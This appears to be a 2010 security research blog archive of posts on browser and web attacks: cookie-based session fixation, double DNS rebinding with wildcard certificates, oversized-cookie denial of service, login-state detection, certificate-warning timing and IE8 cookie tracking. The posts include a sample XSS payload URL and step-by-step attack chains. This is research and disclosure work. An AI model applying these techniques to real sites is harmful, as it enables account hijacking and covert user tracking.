Cenzic 232 Patent
Paid Advertising
web application security lab

Archive for the 'Webappsec' Category

MITM, SSL and Session Fixation

Wednesday, September 1st, 2010

23 posts left…

It’s been known for a long time that HTTP can set cookies that can be read in HTTPS space because cookies don’t follow the same origin policy in the way that JavaScript does. More importantly, HTTP cookies can overwrite HTTPS cookies, even if the cookies are marked as secure. I started thinking of a form of session fixation during our research that uses this to the attacker’s advantage. Let’s assume the attacker wants to get access to a user’s account that’s over SSL/TLS. Now let’s assume the website sets a session cookie prior to authentication and after authentication the site marks the cookie as valid for whatever username/password combo it receives.

First, the attacker goes to the website before the victim gets there so he can get a session cookie. Then, if the victim is still in HTTP for the same domain the attacker can set a cookie that will replay to the HTTPS website. So the attacker sets the same cookie that he just received into the victim’s browser. Once the victim authenticates, the cookie that the attacker gave the victim (and knows) is now valid for the victim’s account. Now if the victim was already authenticated or had already gotten a session token, no big deal. The attacker overwrites the cookie, which at worst logs the user out. Once the victim re-authenticates, voila - session fixation. Now all the attacker has to do is replay the same cookie in his own browser and he’s in the user’s account.

Issues with Perspectives

Wednesday, September 1st, 2010

24 posts left…

When I told one of my guys about the double DNS rebinding attack, he said, “Well it’s a good thing I use perspectives.” So that was my clue that I had better get familiar with the plugin if people are seriously relying on it for security. In the process we found a number of potential issues. For those of you who aren’t super clued in about this tool it was originally designed to handle situations where governments are tapping people using things like Packet Forensics where a valid certificate authority is being used to man in the middle someone or a group of individuals.

First of all it’s easy to detect perspectives for a man in the middle. Perspectives sends a lot of HTTP traffic, which the attacker can easily read and figure out is related to perspectives. That may not seem important, because if an attacker knows that a user has it installed what can they really do? We’ll come back to this.

Embedded content is not verified by perspectives, only the parent window. Because most websites (even HTTPS) use third party service providers, caching servers or whatever for static content, the attacker will simply MitM’s the “static” servers serving up CSS, JavaScript or objects that are dynamic content once rendered. By modifying the response and including active content, anything that can be seen by the DOM is still accessible to the man in the middle. Kinda defeats the purpose of perspectives…

Using the fact that an attacker knows that someone is using perspectives (which they can determine by forcing someone through an SSL/TLS link), the attacker can simply MITM only the embedded content. Of course there are changes a user can make to the settings and options to reduce this risk, but like all options, they’re probably not changed often and the defaults really aren’t good.

Lastly, I tried perspectives against the double DNS rebinding issue, and unfortunately instead of the huge pop-down that would actually alert someone to the problem, because the attack uses a valid cert from a nearby sub-domain that perspectives has probably seen before it only gives the small warning that most people probably wouldn’t notice unless they were really paying attention.

Prior Knowledge Of User’s Cert Warning Behavior

Wednesday, September 1st, 2010

25 posts left…

One of the issues Josh and I talked about at Blackhat was how the SSL certificate warning message can be used to gain information about a user’s behavior and how that can be used against the user. Let’s say a man in the middle causes an error via proxying a well-known owner/subsidiary. For example let’s say https://www.youtube.com/ which most technical people know belongs to Google and which, incidentally causes SSL/TLS mismatch errors because it’s mis-configured. Experts who see such an error and investigate will think it’s just a dumb (innocent) error. Non-experts will click through immediately, because they always do when they see such things.

By measuring the wait time the attacker can know which type of user the victim is - a technical one, or a novice. If the user is a novice the attacker knows they don’t have to worry anymore - they can deliver their snake oil cert later if the user goes through it “quickly” because that user’s behavior will most likely stay the same. Of course figuring out the timing might be a bit tricky because really new users will be awfully confused by cert warnings and will seem “slow” I’d bet. Anyway, something to investigate further.

IE Cookies

Friday, August 27th, 2010

26 posts left…

The fact that IE8 doesn’t delete cookies upon telling it to (at least in my testing) until browser shut-down isn’t just bad for usability (and ho boy is it annoying when you’re testing) but it has other interesting privacy implications. Generally I tell people not to set the same cookie more than once. That makes it harder to use old XMLHTTPRequest bugs to download the cookie (which may otherwise be protected using HTTPOnly). But what if the cookie weren’t sensitive, but rather used for tracking?

If a site sets a unique cookie and the user clears cookies in IE8, that doesn’t mean that IE8 doesn’t keep sending the cookie (it’s retained in memory) - which means the site still gets it. If the site is trying to track the user they can simply keep setting the exact same HTTP cookie with an “expires” in the future to make it persist after the browser closes and voila! Even though the user thinks they cleaned their cookies, not for a moment was the cookie removed in IE8. Could be useful for banner advertisers or companies that need to do large scale tracking of users.

MitM DNS Rebinding SSL/TLS Wildcards and XSS

Sunday, August 22nd, 2010

27 posts left…

This was one of the more complex issues Josh Sokol and I talked about during our presentation at Blackhat. Let’s say there’s an SSL/TLS protected website (addons.mozilla.org) that an attacker knows that the victim is using. The attacker is a MitM but let’s say that addons.mozilla.org has no security flaws in it whatsoever. Let’s also say that there’s another subdomain called mxr.mozilla.org that has the following attributes: It has no important information on it (otherwise the attacker would be content with attacking it instead), it’s vulnerable to XSS, it doesn’t care about host headers and uses a wildcard cert for *.mozilla.org. How can an attacker use that to their advantage?

The victim requests the IP for addons.mozilla.org for which the attacker modifies the responding DNS TTL to 1 sec (and all subsequent DNS traffic to that domain). The victim logs into addons.mozilla.org (gets cookie). Doing login detection can help determine that the user is authenticated but it’s important that the attack doesn’t start before this, otherwise the attack will fail.

The attacker firewalls off the IP to addons.mozilla.org and forces user to the XSS URL at:
https://addons.mozilla.org/mozilla-central/ident?i=a%20onmouseover%3Dalert(’XSS’)%20a (notice that the hostname is wrong as it should be mxr.mozilla.org because that is where the XSS lives). Note that this WAS a real XSS in mxr, but has been fixed, and to make it work it would require the user to mouse over it, so you’d have to do some clickjacking or something, but let’s just pretend that all wasn’t a problem, and/or that there was an easier XSS.

The victim requests the IP for addons.mozilla.org again but this time the attacker responds to the DNS request (with 1 second TTL) with the IP address of mxr.mozilla.org (not addons). The user connects to the mxr.mozilla.org IP address sending the wrong host header - the reason this works is because the wildcard SSL/TLS cert allows for any domain and the mxr.mozilla.org website doesn’t care about host headers. The victim runs the XSS in context of addons.mozilla.org even though they’re on the mxr.mozilla.org IP. That sounds bad (maybe useful for phishing) but there’s worse the attacker can do.

The attacker can give up if addons.mozilla.org doesn’t use HTTPOnly cookies because the attacker can just steal the cookie from JavaScript space. But let’s assume that addons has no flaws in it, including how it sets cookies. In that case the attacker just rebinds again. For lack of a better term we called this “double DNS rebinding.”

The attacker firewalls off IP for mxr.mozilla.org and un-firewalls off the addons.mozilla.org IP. The victim’s browser re-binds and requests DNS for addons.mozilla.org again. The attacker delivers the IP for addons.mozilla.org. The victim’s cookie is sent to addons.mozilla.org and the JavaScript is now in context of addons.mozilla.org. The victim runs BeEf shell back to attacker, which allows the attacker to see the contents of the user’s account and interact as if they were the user.

We talked with a few people in various places about how likely this is, and although it worked on one of the two sites we checked we think the likelihood that it will work on SSL/TLS enabled sites is pretty low. It has to be wild card, has to have HTTP Response splitting/XSS, etc… and has to ignore the host header. We guesstimate that it’s probably between 2-4% of SSL/TLS protected sites that would be affected by this, although, in reality there’s not a lot of risk here because this has a lot of moving parts - there are certainly easier exploits out there. But the interesting part is this is yet another reason that all sub domains should be considered in scope when you’re talking about something sensitive sitting behind authentication beyond just breaking in and stealing the cert outright.

Incidentally when I told the Mozilla guys about this, they said, “Why would we have checked for XSS in mxr? There’s nothing important on there… It’s all public information.” followed by, “Well, it’ll be fun checking for XSS on all our sub domains now.” That’s a good idea anyway for phishing, but checking for host headers is an easier short-cut in the short term. I wouldn’t worry about this attack, because it’s unlikely, but it was interesting coming up with the use case.

Using Cookies For Selective DoS and State Detection

Sunday, August 22nd, 2010

28 posts left….

This is a continuation of the first post where we described how you can use cookies to DoS certain portions of the website. After our speech one of the Mozilla guys came up to us and described another attack that arises from this. Let’s say when a user logs in it sets a cookie that is 200 bytes long, and when they log out it re-sets the same cookie to 50 bytes. Well if the attacker can set a cookie with a particular path to a single image on the site, for instance, they can use JavaScript to check with an onerror event handler to see if the image has loaded.

By combining the over-long cookie (minus 50 bytes) a logged in state will cause the image to fail to load, where as a logged out state will allow the image to load just fine. In this way an attacker can tell cookie states as long as the cookies are variable width and there aren’t other cookies muddying the waters. Interesting attack, I thought!

Using Cookies For Selective DoS

Sunday, August 22nd, 2010

29 posts left…

One of the things Josh Sokol and I talked about in our presentation at Blackhat was a way to use over-sized cookies to cause a DoS on the site. The web server sees the overlong cookie and stops the request from completing. This is not new and has certainly been discussed before. However, one thing that wasn’t discussed is that using the path an attacker can selectively cause the website to stop displaying portions of the site. For instance, if the attacker wants to shut down /javascript/ or /logout.aspx or /reportabuse.aspx or whatever, they can by setting an overly-long cookie for that particular path.

Setting cookies on the target sub domain would require something like header injection/Response splitting, XSS, or a MitM attack. It should be noted though that it doesn’t have to be on the target sub domain - it can be an exploit in another sub domain because cookies don’t follow the same origin policy if the cookie is scoped to the parent domain. In this way an attacker could turn off Clickjacking prevention code (deframing scripts), or turn off other client side protections or parts of the site that are bad from an attacker’s perspective. The only real solution to this is for all browsers to start making the absolute maximum size of cookies smaller than the smallest that web servers will allow (Apache was smaller than IIS by default for instance).

Detection of Parameter Pollution

Saturday, August 21st, 2010

30 posts left…

There are a lot of web based exploits that can be really tricky to spot if you’re talking about a WAF. Multiple encoding issues, obfuscation and the like… Well, one attack in particular I think is actually pretty easy to detect programmatically (in most cases). In the case of HTTP Parameter Pollution the attacker has to double up on the parameters. So something like: ?a=1&b=2&a=3. If the WAF sees the same parameter (in this case “a”) supplied twice it’s pretty easy to understand that either there was something screwed up or it’s an attack. Either way, it’s worth reporting, and possibly even blocking if you know your site isn’t built like this.

Of course the normal caveats for non-standard parameter delimiters apply (hopefully the WAF could be developed to understand those delimiters in a perfect world). Not to mention the fact that even last week I saw a site that did Parameter Pollution on itself because of shoddy programming (and probably a lot of cutting and pasting by the developer). There could also be cases where some parameters come in on the URL field and others are POST parameters, so that would need to be taken into account as well for systems that don’t care and accept it all as a big pool of parameters. Lastly, I doubt many attackers are actually using Parameter Pollution (yet), but it should be easy enough to catch in most cases.

Quick Proxy Detection

Friday, August 20th, 2010

32 Posts left…

Just a quicky post on how in Firefox you can detect proxies using image tags. Firefox (and possibly other browsers but I first saw it in Firefox) use [ ] to denote IPv6 (I believe that’s it’s original intention anyway) but it also works in IPv4.

Something as simple as http://[123.123.123.123]/img.jpg?unique_id embedded into a page could be used to see if the user is using a proxy, which, as far as I’ve seen - at least using Apache’s proxy, doesn’t understand that syntax and therefore won’t fetch the image. This does give false positives when using something that blocks cross domain requests, and robots that try to stay on the same domain. Anyway, this might be helpful to someone.

Some Possible Insights into Geo-Economics of Security

Wednesday, July 21st, 2010

38 more posts left…

I first started thinking about this when I talked to a friend from Vietnam a year or so ago regarding his CISSP. Once upon a time it was nearly impossible to find someone in Vietnam with a CISSP. At first I thought he was making some sort of joke about the usefulness of the certificate, but for some things in Vietnam it’s really a hot commodity. It turns out that the cost of living there makes a CISSP almost totally not worth it. Even though it’s expensive in the United States (where I live) respective to the wages in Vietnam it’s weeks or even a month worth of work. Therefore the rate at which a certificate would be awarded is less, not because of skill, know-how or anything else. It’s purely economics. Slowly that has changed and more people now have it than before in Vietnam, but it’s still not equal as a percentage compared to the USA, for instance, from what I was told.

That got me thinking about other issues that are relatively the same. For instance SSL/TLS certificates. Buying a certificate to allow for transport security is a good idea if you’re worried about man in the middle attacks. Yes, that’s true even despite what I’m going to tell you in my Blackhat presentation where Josh Sokol and I will be discussing 24 different issues of varying severity with plugins and browsers in general. But when you’re in another country where the cost of running your website is a significant investment compared to the United States, suddenly the fees associated with the risks are totally lopsided. So this may be why you might see a lower adoption rate of certificates in certain regions. More importantly there really is no long term reason the security industry can’t create a free certificate authority (over DNSSEC for instance) that provides all the same security or more even without the costs - therefor making it a more equal playing field.

Lastly I started thinking about bug bounties and how they work almost opposite. Unlike security, where the cost is high for playing, hacking can be much more lucrative based on your geo-economic situation. For instance, a $3000 bug bounty for something that takes two weeks to work on equates to a $78k a year job if you can be consistent. In the United States for a skilled researcher that’s barely worth the time. But in a country where the average income is closer to $10k a year, something like this might highly incentivize researchers to focus on attack verses defense, which few can afford. Anyway, I thought it was an interesting concept that may play out entirely different in reality, but it was a fun thought exercise.